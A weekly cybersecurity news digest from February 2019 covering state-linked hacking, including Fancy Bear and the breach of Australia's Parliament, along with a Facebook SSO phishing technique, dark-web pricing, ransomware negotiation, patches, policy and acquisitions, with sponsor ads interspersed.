Find out how you can be equipped with a continuous 360° view of which critical assets are at risk, what security issues you should focus on, and how best to harness your resources to resolve them. Simulate, validate and remediate hackers’ path to your organizational critical assets.
The Week that Was.
February 23, 2019.
By the CyberWire staff
More Fancy Bear sightings.
Microsoft said on Wednesday that it had spotted Russian cyber activity targeting European, Atlanticist think tanks. The targeted institutions include the German Council on Foreign Relations, the Aspen Institutes in Europe, and the German Marshall Fund. Redmond says spearphishing attacks targeted more than a hundred accounts belonging to employees in Belgium, France, Germany, Poland, Romania, and Serbia between September and December 2018. The primary suspect behind the attacks is Fancy Bear (APT28), Russia's GRU military intelligence service. Microsoft believes Fancy Bear's goal was influencing upcoming European elections, noting that the attacks validate warnings raised by European leaders about the threat level in the region.
Attending RSA? Book a Meeting Today – and Get a Free Expo Pass!
Join Carbon Black at the RSA Conference. Schedule time for a 1:1 conversation at RSA and see the show floor – on us! Book your meeting today!
Australia thinks state espionage services responsible for cyberattack on Parliament.
Australian Prime Minister Morrison announced Monday that "a sophisticated state actor" was behind network intrusions that targeted Parliament and the country's three main political parties (Liberal, Labour, and National) (The Conversation). Alastair MacGibbon, head of the Australian Cyber Security Centre (ACSC), says investigators still don't know which data the attackers had access to, although Labor Party leader Bill Shorten notes that the political parties were compiling "large amounts of information" about voters in preparation for the upcoming federal election (The Verge).
Few details on the attacks have been disclosed, but they're said to have involved a new form of malware with China's "digital fingerprints." Authorities are aware that such fingerprints may be deliberate misdirection by some other nation-state actor (Sydney Morning Herald). MacGibbon said the attackers' level of sophistication restricts the list of suspects to "a limited number of countries" (Australian Broadcasting Corporation). In addition to China, those countries would be Russia, Israel, and the US (Register). (We might point out that such a list should include at least France and the United Kingdom as well.) But it's important to note that this remains public speculation based on conjectured national capabilities, and not on any actual evidence, circumstantial or otherwise. The general consensus, however, is that signs point to China as the prime suspect.
A preliminary attribution by the cyber company Resecurity, discussed Thursday in the Wall Street Journal, cited Iran's Mabna Institute as an even likelier suspect. The Mabna Institute has been indicted by the US for cyberattacks against American enterprises, and Resecurity thinks the activities reported and observed around Australian targets employ techniques Mabna has used in the past. Thus the spoor leading back to China would amount to a false flag operation. But this strikes most other observers as unlikely. The evidence publicly cited is circumstantial and ambiguous at best, including documents retrieved from a cloud server that may or may not been used by the hackers. Sources close to the investigation but willing to speak anonymously to the Sydney Morning Herald dismiss suggestions of Iranian involvement as far-fetched. They can’t yet speak on the record, but the anonymice in this case seem pretty certain that the attacks are traceable back to Beijing.
The Australian Broadcasting Corporation interviewed some academic experts on attribution. Their explanations of how one tells whether a nation-state is behind an attack are surprisingly impressionistic, more art than science, although there's a bit of science there, too.
Get comprehensive information about securing the DIB supply chain
According to a 2018 Ponemon report, 61% of surveyed organizations have experienced a data breach caused by a third-party vendor. Cyber criminals are targeting Defense Industrial Base (DIB) supply chain vendors in order to gain access to government networks. The latest case study from Attila Security will help identify solutions to keep your organization’s data secure while avoiding disruptions to the DIB supply chain. Download the Vulnerabilities Within The DIB Supply Chain Case Study today.
Chinese and Iranian cyberespionage surge.
Chinese and Iranian cyberattacks against the United States have escalated recently, with the hackers exhibiting considerably improved levels of skill. Dozens of American corporations and several US government agencies have been attacked by Iranian hackers, and the scope of the attacks is wider than previously reported. The upsurge in Iranian espionage campaigns is thought to be in response to the Trump administration's withdrawal from the Iran nuclear deal. China also increased its espionage after an 18-month lull following the 2015 US-China Cyber Agreement. Chinese attacks are now said to occur as frequently as before the deal took effect. The new attacks are stealthier and more advanced. Boeing, General Electric Aviation, and T-Mobile are among those recently attacked, although it's unclear with what success (New York Times).
Expert-led sessions. Two Expo halls full of the latest cybersecurity solutions. Fascinating keynote speakers. You guessed it—it’s RSA Conference 2019, March 4 – 8 in San Francisco, the ultimate place to expand your knowledge, your perspective, your network and your career. From the latest trends to best practices, RSAC 2019 is your one-stop-shop for cybersecurity intel. Register today.
Phishing in Facebook.
Researchers with the password manager service Myki discovered a "hyper-realistic" phishing campaign targeting Facebook users by spoofing single sign-on (SSO) login windows. The attackers used a block of HTML to present an SSO window nearly identical to the ones used by Facebook, complete with Facebook's legitimate HTTPS-based URL. The easiest way to detect the fraud is to try to drag the SSO window outside of the primary window. Legitimate SSO prompts can be dragged outside of the web page, while this pop-up will disappear past the edge of the window (Ars Technica). The Myki researchers point out that most users won't be aware of this technique, since it's not included in current phishing guidelines.
Access Unlimited Virtual Practice Labs - Limited Time Offer
Develop your cybersecurity skills through hands-on learning with unlimited virtual labs from Rangeforce, Kaplan, Practice Labs, Cydefe, and more. Cybrary is the world’s fastest growing cybersecurity online learning platform, dedicated to offering the most current industry tools and curriculums taught by subject matter experts, and providing the best hand-ons labs and certification preparation anywhere. Join Cybrary Insider Pro for 30% OFF using discount code CYBERWIRE30.
Metaphor shift: not Pearl Harbor, but Hamel.
"Cyber blitzkrieg" is a more accurate metaphor for coordinated cyberattacks against multiple sectors of critical infrastructure than "cyber Pearl Harbor" or "cyber storm," according to Professor Greg Austin from the University of New South Wales. He writes that any such attack would be multi-vector, multi-wave, and involve both civilian and military targets. Austin told ZDNet that "states are exploring the use of related tactics very vigorously in a way in which they're not exploring similar tactics for nuclear warfare." He points out that the first known cyberattack against an electric grid happened two decades ago, and the threats have grown far more dangerous since then. Nation-states have mapped their rivals' critical infrastructure for years, and they're already staging disruptive attacks.
Scaling defenses to meet that sort of attack might be more difficult than defenders would wish. Australian Defence Force (ADF) Head of Information Warfare Major General Marcus Thompson worries that Australia wouldn't be able to defend against a large-scale, coordinated attack against its critical infrastructure (ZDNet).
(The defining characteristics of Blitzkrieg were combined arms, fast operational tempo, detailed planning, and closely coordinated mobile action. This approach to combat wasn't named until the Germans followed it in 1939, but Lieutenant General Sir John Monash was almost certainly its first practitioner, as early as 1918, with a coordinated attack using infantry, artillery, air, and armor. So give the Australian Army full credit, and instead of "Blitzkrieg," we'll say "Hamel.")
Black market report.
Researchers at Top10VPN compiled two reports on dark web commodity pricing in the United States and the United Kingdom, showing that a full online identity of the average person in the US is worth around $1200, while the average value of someone in the UK is approximately £800. The US report shows that hacked Amazon accounts are worth $30 each, topping the list of online shopping accounts. Best Buy accounts come in second at $26.50. The researchers say accounts with these two companies are the most valuable due to their high-value inventories. Stolen bank details in the US average $259. The UK report shows that a British Airways account is worth nearly £32, after the company suffered a massive data breach last year. The average price for someone's bank details in the UK is £347.
Researchers at Coveware and McAfee looked at communications between attackers and victims of ransomware attacks, noting that attackers in these cases, particularly in recent, targeted campaigns, often provide their victims with 'support' to walk them through the payment process and the subsequent decryption of their files (Coveware). Ryuk ransomware, for example, comes with one of two notes. One is friendly and well-written, and asks for about 50 Bitcoin. The other is brusque and to the point, but asks for a lower amount between 15 and 35 Bitcoin. Replies from Ryuk operators during negotiations are terse messages that typically convey the bare minimum of necessary information. After a victim pays the hefty ransom, the attackers will provide a decryptor, although the decryptor is very buggy and is likely to permanently destroy the encrypted files (Help Net Security).
Digital Shadows published a white paper revealing that cyber criminals are offering average annual salaries of $360,000, with one group offering a starting salary of $768,000, which will increase to $1,080,000 after the second year of work (Business Wire).
Two WordPress plugins have issued security patches. WP Cost Estimation & Payment Forms Builder fixed a directory traversal vulnerability, and the Simple Social Buttons plugin received a patch for a critical vulnerability that could allow privilege escalation (Infosecurity Magazine).
Adobe released another patch for the critical zero-day vulnerability in Acrobat Reader: last week's patch for the bug left a security hole (Threatpost).
Crime and punishment.
The strange case of Paul Whelan, detained in Russia on espionage charges, is still strange, as he and his family appear caught in a paperwork Catch-22, and as Russian authorities seem in no hurry to go to trial (Foreign Policy).
Laurie Love, arrested in 2013 by Britain's National Crime Authority for hacking but not charged, sued the NCA to get his seized devices back. The judge said no. Since by Mr. Love's admission the data they contained weren't his, he's not entitled to get them back (Naked Security).
The fraud case against Autonomy executives involved in the sale of that company to HP has touched DarkTrace, lightly. Nicole Eagan, co-CEO of the Cambridge unicorn, has held a voluntary interview with the FBI (Telegraph). Two Autonomy executives, former-CEO Mike Lynch and former-CFO Sushovan Hussain, had held seats on DarkTrace's board until they resigned last year after coming under suspicion of fraud. (Or, in Hussain's case, being convicted of fraud (Bloomberg).) DarkTrace does not seem to be suspected of involvement in the alleged securities fraud, but the company was the subject of the first investment by Invoke Capital, a venture fund Lynch founded after he sold Autonomy to HP in 2011 (City A.M.).
Courts and torts.
A class action suit alleging unfair "no-poach" agreements among US Federal contractors has been filed (HR Dive).
Policies, procurements, and agency equities.
The UK's House of Commons has issued a report calling for more regulation of social media (BBC).
Some inside baseball at the US Department of Homeland Security: Congress has told DHS to keep $90 million in cybersecurity research funding in its Science and Technology Directorate, stopping plans to shift the money to the Cybersecurity and Infrastructure Security Agency (FCW).
Fortunes of commerce.
Samsung is investing in its networking equipment line, hoping that international security concerns about Huawei will enable it to steal a march on its Chinese competitor (NDTV Gadgets 360).
Gizmodo says that NSO Group has renamed itself Q Cyber Technologies. The rebranding preceded this week's formation of a competing business alliance, Intellexa, in which a number of lawful intercept and spyware vendors will assemble to offer a "one-stop shop" for their wares.
Security concerns about Huawei were met with a double backlash. China accuses the US of simple trade-war bullying (Forbes). Beijing has also warned Canada of unspecified but costly consequences should that country exclude Huawei from its 5G buildout. Presumably those consequences would involve litigation over an alleged breach of a foreign protection agreement (CBC).
Sentiment in favor of closer regulation of tech companies, especially of social media, rises (Telegraph). Sources in the UK in particular see an end to Big Tech's "self regulation" (Telegraph). The Parliamentary report on fake news was scathing: "Companies like Facebook should not be allowed to behave like ‘digital gangsters’ in the online world, considering themselves to be ahead of and beyond the law."
Facebook CEO Zuckerberg, with whom the US Congress would again like to speak (Silicon Valley Business Journal), has delivered a talk on ethics as partial fulfillment of promises the company has made to do better (TechCrunch).
Splunk has decided to exit the Russian market (ZDNet).
Whatever the challenges, problems, and promises of artificial intelligence may be, one issue will surely be the available of human labor qualified to build it (WIRED). AI will produce as well as relieve labor shortages.
Military personnel systems aren't immune to changing needs and changing work forces. The US Army, for one, is studying ways to modernize its own personnel system (Federal News Network). But we imagine 11Bs and 13Bs will be with us always.
Mergers and acquisitions.
On Tuesday Palo Alto Networks made it official: its rumored acquisition of Israeli security firm Demisto will go through, at a price tag of $560 million. Demisto specializes in security automation and orchestration (TechCrunch). Here's the 8-k. Silicon Valley Business Journal discusses the acquisition as a case study in how venture capital works (since the obverse of every acquisition is an exit).
Virginia-based Dark Cubed has acquired Fenris IV Incorporated, also based in Virginia. Dark Cubed, which focuses on threat protection for highly regulated small and medium businesses, will integrate Fenris IV's endpoint protection, scanning, penetration testing, and other services into its offerings (PRNewswire). (As Technical.ly DC notes, Fenris IV is not to be confused with Fenris Digital, a different company.)
Micro Focus is buying security analytics software shop Interset. Micro Focus intends to integrate Interset's offerings into its Security, Risk, and Governance portfolio (Help Net Security).
Apple has "quietly" acquired AI specialist PullString in a deal thought to be worth at least $30 million (ZDNet).
As it exits stealth, Silicon Valley-based Armorblox announces a $16.5 million Series A round. General Catalyst led the round, with participation from Point72 Ventures. Amorblox offers deep learning technologies designed to thwart social engineering (CrunchBase).
And security innovation.
RSAC 2019's Launch Pad will offer start-ups an opportunity to pitch venture capitalists (Help Net Security).
A note on some hundred AI start-ups thought to be worth watching (CB Insights).
Investors are concerned that moves in the Maryland Assembly to restrict TEDCO funding could inhibit the development of a robust startup community in the state (Baltimore Business Journal).
Today's issue includes events affecting Australia, Canada, China, European Union, Germany, Russia, United Kingdom, United States.
Grow your brand and increase your customer base by educating our audience about your products, services, and events by advertising on The CyberWire. We’ve built trust with an influential (and often hard to reach) audience of CISOs, CSOs, and other senior execs in the security space, across a wide array of industry verticals. Learn more.
Be a part of the CyberWire story.
People ask us (a lot) how they can support what we do. We have our sponsorships and services, of course, but those are not always within every supporter's financial reach, or it might just not be the right time for you to do those things. That's why we launched our new Patreon site, where we've created a wider variety of support levels, each with some new benefits. Our patrons are important to our future, and we hope you'll consider becoming one. We invite you to become part of the CyberWire story. Become a patron today.